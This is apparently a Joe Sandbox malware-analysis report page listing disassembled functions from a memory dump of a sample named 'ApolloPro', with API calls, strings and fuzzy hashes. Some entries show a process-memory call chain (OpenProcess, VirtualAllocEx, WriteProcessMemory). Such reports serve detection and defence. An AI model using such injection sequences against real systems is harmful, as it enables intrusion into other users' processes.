                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              • Opcode ID: 7395ee49059b63869588a2f0717dda27e52f8fb55cf071b742682028ffcc2183
                                                                                              • Instruction ID: 909136242e24fcf95e036c794b7b955f6426beab5840d00513fcdb5acb8ba090
                                                                                              • Opcode Fuzzy Hash: 7395ee49059b63869588a2f0717dda27e52f8fb55cf071b742682028ffcc2183
                                                                                              • Instruction Fuzzy Hash: 3E516621A09602C7EB21B714C9653BB2BD39B40752F30487CE8C6863A9FF748DD99B46
                                                                                              Function 00650654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #$+
                                                                                              • API String ID: 0-2552117581
                                                                                              • Opcode ID: 284c326e0cbe20f6354d57e9adaed1ba7adab80dd7d55af988efc2fb954c07dd
                                                                                              • Instruction ID: fa66cb070c9e7150c5e8a3bf0a9dac9472f75036fc7ecebaa15ff02b91364b62
                                                                                              • Opcode Fuzzy Hash: 284c326e0cbe20f6354d57e9adaed1ba7adab80dd7d55af988efc2fb954c07dd
                                                                                              • Instruction Fuzzy Hash: 885112B5500255DFEB25EF28C880AFA7BA2EF5A310F144159FC969B390C734EC86CB61
                                                                                              Function 0063E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_free
                                                                                              • String ID: #Vd
                                                                                              • API String ID: 2620147621-1668578872
                                                                                              • Opcode ID: 2ae0daca18b78697a90b3bb4ea88e3af27880279f75c4e61f5216f3f7d2ec20e
                                                                                              • Instruction ID: 95bab6ebc099ee6d967d4757b771d983a96df2bac4290286374e710196ada35b
                                                                                              • Opcode Fuzzy Hash: 2ae0daca18b78697a90b3bb4ea88e3af27880279f75c4e61f5216f3f7d2ec20e
                                                                                              • Instruction Fuzzy Hash: 2D513B71A047418FDB64CF28C591B6FBBE2BF85314F14492DE98A87391E732D805CB92
                                                                                              Function 0064CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$_memmove
                                                                                              • String ID: ERCP
                                                                                              • API String ID: 2532777613-1384759551
                                                                                              • Opcode ID: c0e76ac6e3f99205ea49755ce74a8518be90a05daed85d890668cfe3b0bfbe37
                                                                                              • Instruction ID: c1d0ed3505c847007757b8d833f98e417051bfe6eb6821d5fc20de0bb737cb3b
                                                                                              • Opcode Fuzzy Hash: c0e76ac6e3f99205ea49755ce74a8518be90a05daed85d890668cfe3b0bfbe37
                                                                                              • Instruction Fuzzy Hash: 5251B371D003099FDB24DF65C885BEABBEAEF04714F14856EE84ADB351E7309586CB40
                                                                                              Function 0068A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00691CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00689E4E,?,?,00000034,00000800,?,00000034), ref: 00691CE5
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0068A3F7
                                                                                                • Part of subcall function 00691C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00689E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00691CB0
                                                                                                • Part of subcall function 00691BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00691C08
                                                                                                • Part of subcall function 00691BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00689E12,00000034,?,?,00001004,00000000,00000000), ref: 00691C18
                                                                                                • Part of subcall function 00691BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00689E12,00000034,?,?,00001004,00000000,00000000), ref: 00691C2E
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068A464
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0068A4B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 614c4a9d1e187f41d9ca4e41fa9b61018e8a288f73f0af79c3416b67fc74d3e3
                                                                                              • Instruction ID: 8bd5c1d7a1978f1e714b3f547ab3467e43924678ba9a20bbc39011ca291c1420
                                                                                              • Opcode Fuzzy Hash: 614c4a9d1e187f41d9ca4e41fa9b61018e8a288f73f0af79c3416b67fc74d3e3
                                                                                              • Instruction Fuzzy Hash: D4414C7294121CAFDF10DFA4CD85AEEB7B9EB45300F10419AFA45B7280DA706E45CBA1
                                                                                              Function 006B79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006B7A86
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006B7A9A
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B7ABE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: 8f4680a229c596b1b3f09d700d17a7e8a02e4f5e90af6e683c37ba9f7bdda89b
                                                                                              • Instruction ID: 047d8a0dd125395047222374e10ce086983ff492117a0e0cf3e104607bf2f241
                                                                                              • Opcode Fuzzy Hash: 8f4680a229c596b1b3f09d700d17a7e8a02e4f5e90af6e683c37ba9f7bdda89b
                                                                                              • Instruction Fuzzy Hash: 0221A372654219BFDF158F54CC42FEE3B6AEF88724F110214FE156B1D0DAB1A991CB90
                                                                                              Function 006B81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006B826F
                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006B827D
                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006B8284
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 49916bc863b911bf5340b156cb6a609e74c66a88d0903f317e36b290759a5fae
                                                                                              • Instruction ID: 3b71979535ca10ab20a8066c26edc164fde8e550330d9747445462c51e2433a9
                                                                                              • Opcode Fuzzy Hash: 49916bc863b911bf5340b156cb6a609e74c66a88d0903f317e36b290759a5fae
                                                                                              • Instruction Fuzzy Hash: A0217AB1604209AFEB00DF58CC85DB737AEEF5A3A4B040159FA119B3A1CB70EC51CBA0
                                                                                              Function 006B72D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006B7360
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006B7370
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006B7395
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: eede3170b82b5e22007542d662d0a8ffd9f5111ce7478470978f25232a3db835
                                                                                              • Instruction ID: f410fcca0a300edaeac175c06412c50b0bf80bc284c77ea4388ebf71952b6a2f
                                                                                              • Opcode Fuzzy Hash: eede3170b82b5e22007542d662d0a8ffd9f5111ce7478470978f25232a3db835
                                                                                              • Instruction Fuzzy Hash: 9121C272614118BFEF158F55CC85FFF37ABEB89764F018124F9009B290CA71AC919BA0
                                                                                              Function 006B7D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006B7D97
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006B7DAC
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006B7DB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 6dddeb1e686a28f835eb5cb54f89472f76b1220abd4afb67b38e3047b570ea48
                                                                                              • Instruction ID: 5339a7d37a64942492c5ea75517980e25eba0943aafa73174cde2e003d676f14
                                                                                              • Opcode Fuzzy Hash: 6dddeb1e686a28f835eb5cb54f89472f76b1220abd4afb67b38e3047b570ea48
                                                                                              • Instruction Fuzzy Hash: 9C11E7B2244208BEDF109F65CC05FE777AAEFC9B54F11411CFA41A6190D671A851DB20
                                                                                              Function 0066B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0066B544: _memset.LIBCMT ref: 0066B551
                                                                                                • Part of subcall function 00650B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0066B520,?,?,?,0063100A), ref: 00650B79
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0063100A), ref: 0066B524
                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063100A), ref: 0066B533
                                                                                              Strings
                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0066B52E
                                                                                              • =m, xrefs: 0066B514
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=m
                                                                                              • API String ID: 3158253471-3350302448
                                                                                              • Opcode ID: 4c64d58cca779a7255dddd3762c9aa799c475fa202f8485f3b5a631aaf1e6f01
                                                                                              • Instruction ID: 2959d329cf3a90f282666adef99d53747b6d1ccebffb6b321a722c4e6a2125ca
                                                                                              • Opcode Fuzzy Hash: 4c64d58cca779a7255dddd3762c9aa799c475fa202f8485f3b5a631aaf1e6f01
                                                                                              • Instruction Fuzzy Hash: 3AE09270200351CFE3609F35E808B92BBE2AF04304F10991EE886C2341EBB5D648CF92
                                                                                              Function 006AC6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0067027A,?), ref: 006AC6E7
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006AC6F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                              • API String ID: 2574300362-1816364905
                                                                                              • Opcode ID: 10b97a8e034d7581fa6bed60cb2b222a764fb0f1fde61700a9abcad8a4b0ce21
                                                                                              • Instruction ID: c998644e990c8075f6616c61600ce5ad3791bdede484ae1442b6a4cad7b14314
                                                                                              • Opcode Fuzzy Hash: 10b97a8e034d7581fa6bed60cb2b222a764fb0f1fde61700a9abcad8a4b0ce21
                                                                                              • Instruction Fuzzy Hash: 2CE08C38100302CFE7206B25C848FA6B6D6EB05324B50A429E885C2710D770CC808F10
                                                                                              Function 00644B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00644B44,?,006449D4,?,?,006427AF,?,00000001), ref: 00644B85
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00644B97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-3689287502
                                                                                              • Opcode ID: 0685aeefa8917c96df70c60f49ff687da133f4f9120fdb980a1b80af4afea36e
                                                                                              • Instruction ID: c7c64b5a4f0675dcec1ff6175f695e401ad78198b063ba33978903a359ee0e48
                                                                                              • Opcode Fuzzy Hash: 0685aeefa8917c96df70c60f49ff687da133f4f9120fdb980a1b80af4afea36e
                                                                                              • Instruction Fuzzy Hash: 9BD01770510B12CFE7209F71EC19B56B6E6EF04351F16982ED486E2A50EA70E880CA14
                                                                                              Function 00644BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00644AF7,?), ref: 00644BB8
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00644BCA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 2574300362-1355242751
                                                                                              • Opcode ID: 99190a42dde9245b8c50207b45312ffa8b7889d4890bca14ba05dc2e19496957
                                                                                              • Instruction ID: fd4b66ad31921b50cbe921a858b201792fbc8e62b7ea5a301cf380d465d5a1bf
                                                                                              • Opcode Fuzzy Hash: 99190a42dde9245b8c50207b45312ffa8b7889d4890bca14ba05dc2e19496957
                                                                                              • Instruction Fuzzy Hash: 47D017B0510712CFE7209F71EC09B56B6E7EF04351F26AC6ED486D2A54EE74D880CA10
                                                                                              Function 006B1447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,006B1696), ref: 006B1455
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006B1467
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: 4ca51243e51e29b2c733e4b930d0b40abc19b7e6ae9c88ebff0e7515fea7dc43
                                                                                              • Instruction ID: a197c1306d4b987df65fea138f034bb642f9bd4f5606561c61da20ab91426c8e
                                                                                              • Opcode Fuzzy Hash: 4ca51243e51e29b2c733e4b930d0b40abc19b7e6ae9c88ebff0e7515fea7dc43
                                                                                              • Instruction Fuzzy Hash: 1DD01270511712DFE7205F75C819696B6D6AF06395F15C82A94D5D6650E670D4C0C710
                                                                                              Function 006455F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00645E3D), ref: 006455FE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00645610
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2574300362-192647395
                                                                                              • Opcode ID: 146e82fea98a2c1aea8c2bb3c5747d20b333c4513170992c49bf7d7919d1cdd7
                                                                                              • Instruction ID: 617fb48d31bf6cfc7af13aa505b584de643463770dbc702bd38be116a5e3425a
                                                                                              • Opcode Fuzzy Hash: 146e82fea98a2c1aea8c2bb3c5747d20b333c4513170992c49bf7d7919d1cdd7
                                                                                              • Instruction Fuzzy Hash: 26D05E74920B12CFF7209F71CC08B66BAE6EF04355F16E82ED4C6D26A2E770C880CA50
                                                                                              Function 006A97CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006A93DE,?,006C0980), ref: 006A97D8
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006A97EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
